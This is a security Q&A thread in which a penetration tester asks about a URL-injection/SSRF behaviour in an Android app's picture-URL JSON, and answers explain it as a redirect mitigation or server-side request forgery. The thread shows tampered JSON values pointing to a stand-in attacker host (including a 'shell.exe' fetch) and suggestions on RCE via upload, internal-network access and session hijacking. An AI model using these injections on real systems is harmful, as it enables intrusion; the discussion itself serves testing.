# URL injection vulnerability

Tags: penetration-test, vulnerability, rest

I am busy with a pentest and found something that made me wonder if it would be exploitable. I am currently  not able to exploit it, but I wanted to make sure. Also I am curious why the application/server behaves as it does.

This is the functionality:

- The application lets you upload pictures to the cloud and gives back an URL where the picture then is
- The application then sends that return URL to the server where it is stored so that other people find the pictures through the URL
- Based on some parts of the URL the users get a certain different URL back in a JSON document with all the pictures:

https://res.cloud.com/app/image/something/picture1.jpg

turns into:

`{"URL":"https://res.cloud.com/app/image/param1,param2,param3/something/picture1.jpg"}`

- That JSON document is then used to create GET requests to the exact URL (second one)

This is the "vulnerability":

- Changing the URL to the following:

  `http%73://myevilurl.org/pic1.jpg?https://res.cloud.com/app/image/something/picture1.jpg`
- the user then gets something back in the JSON document in the form of:

  `{"URL":"http%73://myevilurl.org/pic1.jpg?https://res/cloud.com/app/image/something/picture1.jpg"}`
- Which I would expect the application to just try to GET, but the application somehow does a GET request to:

  `https://RootServerOfApplication.com/NameOfApplication/^^The URL above with https instead of http%73^^`

As this is an ongoing test I cannot really go into huge detail (confidentiality and all!). So I hope this provides enough information.

**EDIT:** What I failed to mention above is that when I tamper with the incoming JSON and just put any URL with HTTPS in the JSON string the application tries to GET that precise URL. So I change the JSON to something like this:

`{"URL" : "https://myevilurl.org/shell.exe"}`

The application actually tries to GET shell.exe from my server. This does not work when I try it with %73 instead of an s.

**Edit2:** What I also failed to mention is that this is an android app.

Comment: Have you tried to use the file upload to get a shell? Since you know the URL could you upload some PHP and get RCE?

Comment: See my answer I found out how it works! :D And indeed next on my list is actually uploading more than just images and put some malicious code on there!

Comment: Sounds fun! I would probably have started with RCE attempts then SSRF and finally injection, different methodology I guess

Comment: Is mostly because I started with inspecting the traffic through BURP. From there you go to tampering with what goes through and finding out the inner workings.

Answer (score 0, accepted):

Thank you all for the very good answers that helped me further! What I learned was actually that the URL was stripped at a certain point in the URL (/point/). If that wasn't there the server started doing "weird" things like redirecting to /AppName/***. But when I inject an image like this:

```
https://www.evilurl.org/?point/something
```

I do get an actual GET request to my evilurl. So it is an URL injection vulnerability.

Answer (score 3):

What you are witnessing is probably a *mitigation* for a common vulnerability, [OWASP 2013 A10, Unvalidated Redirects and Forwards](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet).

If the application simply redirected to the URL found in the JSON, verbatim, you'd have a problem.  Basically anyone who tampers with that JSON could send your browser anywhere they want.  This is called an *unvalidated redirect.*

But the application doesn't do that.  Instead, it redirects to a handler within the RootServerOfApplication.com domain, passing the URL from the JSON document as an *argument*.

Presumably, `RootServerOfApplication.com/NameOfAplication` takes a look at the URL and ensures it is valid (e.g. maybe it makes sure the domain is in a white list, one that presumbly includes `cloud.com`).  This mechanism would prevent it from forwarding an end user to `myevilurl.org`.

You should check it out.  Try pasting `https://RootServerOfApplication.com/NameOfApplication/^^The URL above with https instead of http%73^^` directly into your browser and see where it takes you.

Comment: When trieing out the pasting of "that" URL I get an error response when the URL has a /?params part. But when I just put anything behind /NameOfApplication/ then I just get a 404 not found back.

Answer (score 1):

This issue is a [Server-Side Request Forgery](https://www.bishopfox.com/blog/2015/04/vulnerable-by-design-understanding-server-side-request-forgery/) vulnerability.  You can use it to send HTTP GET requests as the vulnerable server. This could be used to route HTTP requests to the internal network or [to IP restricted cloud deployments](http://www.prajalkulkarni.com/2013/06/ssrfxspa-bug-in-httpswwwcoinbasecom.html).

Additionally, this is a HTTP GET proxy, so you could use it to deliver HTTP GET-based exploits while obscuring your IP address.  Loading a valid SWF (even with an incorrect content-type) can be [used to hijack browser sessions](https://www.youtube.com/watch?v=ekUQIVUzDX4).